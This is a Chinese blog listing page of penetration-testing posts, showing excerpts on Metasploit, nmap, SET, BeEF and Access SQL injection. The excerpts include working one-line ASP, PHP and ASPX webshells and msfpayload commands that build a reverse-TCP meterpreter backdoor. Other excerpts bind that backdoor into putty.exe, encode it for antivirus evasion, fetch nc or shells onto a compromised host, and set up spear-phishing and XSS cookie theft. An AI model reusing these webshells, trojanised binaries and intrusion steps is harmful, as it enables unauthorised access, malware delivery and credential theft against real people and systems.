自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(35)
  • 收藏
  • 关注

原创 Linux下的 菜刀 webhandler

你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么……..,没有吧,尤其是这个后门,只有一句话。Asp环境:<%eval request("a")%>Php环境:<?php @eval($_POST['a']);?>Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

2022-03-23 20:48:32 1815

原创 Msf跳板: SSH 版本 route

其实就是利用SSH的端口转发做代理功能root@Kali:/tmp# git clone https://github.com/mubix/metassh.gitCloning into metassh...root@Kali:/tmp# cp -rf metassh/* /pen/msf3/plugins/启动MSF 载入插件msf > load meta_ssh[+] Added 2 Exploit modules for metaSSH[+] Added 1 Pa.

2022-03-23 20:45:40 1327

原创 网络扫描 信息探测之Metasploit 服务探测

msf auxiliary(ack) > use auxiliary/scanner/Display all 236 possibilities? (y or n)目前有236 模块,包括思科 各种数据库 各种服务,例子:我要探测SMB服务msf auxiliary(ack) > search smb path:scannerMatching Modules================ Name...

2022-03-14 22:21:57 216

原创 网络扫描 信息探测之Metasploit 端口探测

msf > use auxiliary/scanner/portscan/(输入两下TAB键盘键)use auxiliary/scanner/portscan/ack use auxiliary/scanner/portscan/tcpuse auxiliary/scanner/portscan/ftpbounce use auxiliary/scanner/portscan/xmasuse auxiliary/scanner/portscan/syn...

2022-03-14 22:20:48 220

原创 网络扫描 : nbtscan

安装root@Kali:/# mkdir /pen/scanner/root@Kali:~# cd /pen/scanner/root@Kali:/pen/scanner# mkdir ntscanroot@Kali:/pen/scanner# cd ntscan/root@Kali:/pen/scanner/ntscan# wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgzroot@Kali:/pen/scanne

2022-03-14 22:19:46 918

原创 网络扫描 nmap 和 Metasploit 自动溢出

原理: 让NMAP通过扫描网络主机,导入METASPLOIT,利用插件自动溢出1.安装插件root@Kali:~# cd .msf4/root@Kali:~/.msf4# lsconfig history john.pot local logs loot modcache modules plugins schemaroot@Kali:~/.msf4# cd plugins/root@Kali:~/.msf4/plugins# wget https://r...

2022-03-12 22:25:04 390

原创 网络扫描 nmap 和 Metasploit 数据转换

自带Metasploit里面能自动导入,启动MSF并且连接数据库 删除久数据root@Kali:~# msfconsole -y /1.yml msf > hosts -dHosts=====address mac name os_name os_flavor os_sp purpose info comment...

2022-03-12 22:21:47 1677

原创 网络扫描 : nmap 常见扫描方式3

请背诵本章保存XML-oXroot@Kali:~# nmap 192.168.40.129 -oX 1.xmlStarting Nmap 6.01 ( http://nmap.org ) at 2012-06-19 08:06 PDTNmap scan report for 192.168.40.129Host is up (0.00038s latency).Not shown: 996 filtered portsPORT STATE SERVICE23/...

2022-03-12 22:19:55 4855

原创 网络扫描 : nmap 常见扫描方式2

请背诵本文!!!!!!!!!!!!!!!!!!NMAP更具什么来判断服务?root@Kali:/pen/nmap/share/nmap# pwd/pen/nmap/share/nmaproot@Kali:/pen/nmap/share/nmap# lsnmap.dtd nmap-os-db nmap-protocols nmap-service-probes nmap.xslnmap-mac-prefixes nmap-payloads nmap-r...

2022-03-11 22:55:19 4556

原创 Windows下默认远程下载

场景:在过去我在做某次台湾渗透的过程中遇到了一个sql注入,数据库权限是sa权限,主机在内网无法直接登录,我们需要上传nc或者其他的转发程序将其转发出来,即便不行,我们也需要上传一个shell,但是基于没有后台的情况下,我们只能将希望寄托于sa。应用:PowershellcertutilftpPowershell在windows版本中powershell支持部分linux命令。如curl,所以可以在系统支持powershell的情况下我们可以使用:curl -O htt

2022-03-11 22:43:47 1275

原创 网络扫描 : nmap 常见扫描方式

请背诵本章!!!!!!!!!!!!!!!!!!!!!!!!打开ub1,nmap最新版本是6.0,所以删除以前安装的5.6版本,安装新版本删除:root@Kali:/# cd /pen/root@Kali:/pen# rm -rf nmap下载安装root@Kali:/pen# wget http://nmap.org/dist/nmap-6.01.tar.bz2 -O /tmp/nmaproot@Kali:/pen# cd /tmproot@Kali:/tmp# tar xf

2022-03-10 22:52:00 4851

原创 插队:微观metasploit的漏洞源代码

微观例子:Symantec Web Gateway 5.0.2.8 Command Execution 地址:http://packetstormsecurity.org/files/113090/Symantec-Web-Gateway-5.0.2.8-Command-Execution.html首先简单的看一下:require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking.

2022-03-10 22:49:36 162

原创 中间人攻击 tcpdump 截获数据

一般LINUX主机都默认安装了他 So,直接说如何使用截获5.5.5.130的全部数据 ,5.5.5.130访问百度root@Kali:~# tcpdump host 5.5.5.130tcpdump: verbose output suppressed, use -v or -vv for full protocol decodelistening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes03:52:57

2022-03-10 22:46:20 346

原创 Nessus :MSF的数据导入

如果没用MSF链接NESSYS,如何导入扫描数据?启动MSF 链接数据库 先删除以前的旧数据 hosts -dmsf > hostsHosts=====address mac name os_name os_flavor os_sp purpose info comments------- --- ---- -------...

2022-03-04 23:21:58 494

原创 Nessus : 配合METASPLOIT

启动NESSUS,启动MSF,启动MSF的时候要链接数据库载入NESSUS插件:msf > load nessus[*] Nessus Bridge for Metasploit 1.1[+] Type nessus_help for a command listing[*] Successfully loaded plugin: nessusmsf >你现在可以输入nessus_help 查看帮助鸟然后链接数据库nessus_connect 账号:密码@安装NES

2022-03-04 23:16:23 345

原创 set: 配置邮箱欺骗

编辑SET配置文件 吧:SENDMAIL=OFF 改为:SENDMAIL=ON安装发射器:root@Kali:/pen/set# apt-get install sendmail启动SETroot@Kali:/pen/set# ./set选择1 1) Social-Engineering Attacks选择:1. Spear-Phishing Attack Vectors3个选项: 1) Perform a Mass Email Attack 2) Create a ...

2022-03-04 23:07:43 468

原创 SET: 配合METASPLOIT的攻击

首先停止APACHE2运行root@Kali:/pen/set# /etc/init.d/apache2 stop* Stopping web server apache2 ... waiting [ OK ]root@Kali:/pen/set#启动SET:root@...

2022-03-02 22:56:22 215

原创 安装配置 SET 工具

打开UB1 下载SET: 1 2 root@Kali:~# cd /pen/ root@Kali:/pen# svn co http://svn.secmaniac.com/social_engineering_toolkit set/ 安装:root@Kali:/pen# cd set/root@Kali:/pen/set# lsconfig readme set set-proxy setup.py...

2022-03-02 22:51:42 1026

原创 Metasploit 针对WEB的攻击

这个是一个自动化WEB安全检测工具,看官方咋吹的吧:Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.Arachni is smart, it trains itself by learning from the

2022-02-28 21:01:25 205

原创 Metasploit XSSF攻击插件的利用

安装xssfroot@Dis9Team:~# cd /tmproot@Dis9Team:/tmp# wget xssf.googlecode.com/files/XSSF-2.1.tar复制到METASPLOIT目录root@Dis9Team:/tmp# mkdir 1root@Dis9Team:/tmp# mv XSSF-2.1.tar 1root@Dis9Team:/tmp# cd 1/root@Dis9Team:/tmp/1# tar xf XSSF-2.1.tar root

2022-02-28 20:55:39 7535

原创 METASPLOIT 和SHELLCODE

SHELLCODE就是溢出程序的后门。一个TCP反弹后门,如果某些EXP上的是弹出记事本 我们改如何生成自己想要的SHELLCODE?首先你要熟悉http://helen.dis9.com/?p=8 (METASPLOIT的PAYLOAD)我们来生成一个 打开UB 1生成BIND SHELL吧: 1234567891011121314151617181920212223242526272829303132333435

2022-02-28 20:53:41 1867

原创 MSF 综合利用: BEEF & XSS攻击(炊少教学)

获得Beef先安装git apt-get install gitbrk@Dis9Team:/pen$ sudo git clone https://github.com/beefproject/beef配置和安装数据库支持: apt-get install libssl-dev libsqlite3-dev sqlite我用sqlite数据库 简单 不麻烦RUBY配置:brk@Dis9Team:/pen/beef$ sudo gem install bundlerFetch

2022-02-27 21:56:05 387

原创 MSF 综合利用: MYSQL & SMBRelay攻击(炊少教学)

下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功!下面来PENTEST : 一个注入点,他是ROOT的权限我们来尝试他能不能读文件,ROOT权限应该能读恩 ,能读文件 (惊现HELEL大黑客!)下面本地伪造个SMB SERVER服务器 msf > use auxiliary/server/capture/smb msf auxiliary(smb) > show ...

2022-02-27 21:52:40 654

原创 Metasploit 权限提升(炊少教学)

前言  现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)  但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的gu

2022-02-26 22:58:31 579

原创 Metasploit reverse Shell的免杀(炊少教学)

rootkithat是我以前的马甲 以前写的文章我们先生成一个X64的WINDOWS XP 的reverse SHELL 12 root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe 提示:你可以用 scheduleme -m 1 -u e /tm

2022-02-25 12:42:51 336

原创 Metasploit的捆绑后门(炊少教学)

绑定payload 至一个可执行文件,让目标不知不觉间中招,以putty.exe 为例: 1 ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5 假如选择一个GUI 界面的程序作为绑定目标并且不使用-

2022-02-25 12:41:02 806

原创 Metasploit可执行后门(炊少教学)

他能生成LINUX WINDOWS PHP ASP JSP等等的后门哦msfpayload as shellcoderoot@Dis9Team:/home/brk# msfpayload -l他能生成多种多样的简单的来说一个正常的Windows后门:用的是:windows/meterpreter/reverse_tcpmsfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \ m..

2022-02-25 12:39:14 108

原创 Metasploit的PAYLOAD(炊少教学)

PAYLOAD是啥子? 就是SHELLCODE,就是METASPLOIT的后门方式,正对WINDOWS LINUX等等都用最长用的是:windows/meterpreter/reverse_tcp我们来换一个,我要他弹窗: Hacked By Dis9 Team打开UB1 XP2 1用exploit/windows/browser/ms10_018_ie_behaviors来做演示 123456789101112131415161718192021

2022-02-23 21:49:38 278

原创 Metasploit的本地漏洞利用教学(炊少)

Metasploit的本地漏洞利用这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar 12345678910111213141516171819202122232425262728293031 msf > search zipMatching Mo..

2022-02-23 21:42:06 137

原创 xss基础,进阶和触发

了解XSS的作用↓盗取cookie(直接登录管理员后台)如何判断存在XSS↓弹窗测试payload<script>alert('xss')</script>//< script > 开始js语句//< /script > 结束js语句Alert('内容') //js的弹窗语句HTML中标记通常是成对出现。常用语句<script>alert(xss)</script>我们输入一个r3bug提交查

2022-02-23 21:25:06 392

原创 access跨库注入

跨库注入之逐字猜解法跨库注入适用环境↓在B站点注入A站点。前提,B和A在同服。跨库目标位置C:\Program Files\r3sec\#Data.mdb判断存在的表↓And 1=(Select Count(*) from [数据库路径].[表]) 实际判断表的语句↓And 1=(Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin])判断字段And 1=(Select Coun.

2022-02-22 12:11:06 488

原创 access偏移注入

access偏移注入利用情景1.偏移注入指access偏移注入,主要是由于数据库结构的问题,其他数据库没办法利用。2.用于解决判断出表名,得不到字段的困境。偏移注入的特点1.看人品和技巧的注入方法,不是100%能成功(基本上看了我的总结成功率就很高了)。2.无需管理账号密码字段,直接爆账号密码。利用条件1.已知管理表名2.已知任意字段(一个或多个多个会增加几率)影响偏移注入成功率的因素1.管理表的字段数越少越好(最好就三个 1.id 2.账号字段 3.密码字段

2022-02-22 12:07:22 1706

原创 access逐字猜解法

联合查询↓优势:方便 快捷缺点:兼容性相对较差。逐字猜解法↓优势:兼容绝大多数注入点。缺点:很慢。工具所使用的语句↓猜字段↓---------------------------------------------------------------------------------------------------------------------------------and exists (select * from 表名) 获取表名and exi..

2022-02-20 19:00:31 470

原创 access拓展注入

注入中发生了什么脚本内sql语句sql="select * from product where id=&id"访问1137这个界面select * from product where id=1137访问1137 and 1=1 这是相等的访问select * from product where id=1137 and 1=1 正常select * from product where id=1137 and 1=2 报错select * from produ..

2022-02-19 22:48:41 264

原创 access手工注入-联合查询法

&注入的作用1.注入得到管理员账号 密码2.脱库&access注入语句and 1=1是判断是否存在注入的返回正常返回不正常 这是存在注入的猜字段猜字段数order by 字段数值一般情况下我们都从1开始order by 1order by 20order by 10order by 最终字段数值我们这样为了减少时间能更快的得到字段数到23就显示错误了 说明 字段是22 存在22个字段 最终得到的字段...

2022-02-19 22:45:36 1348

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除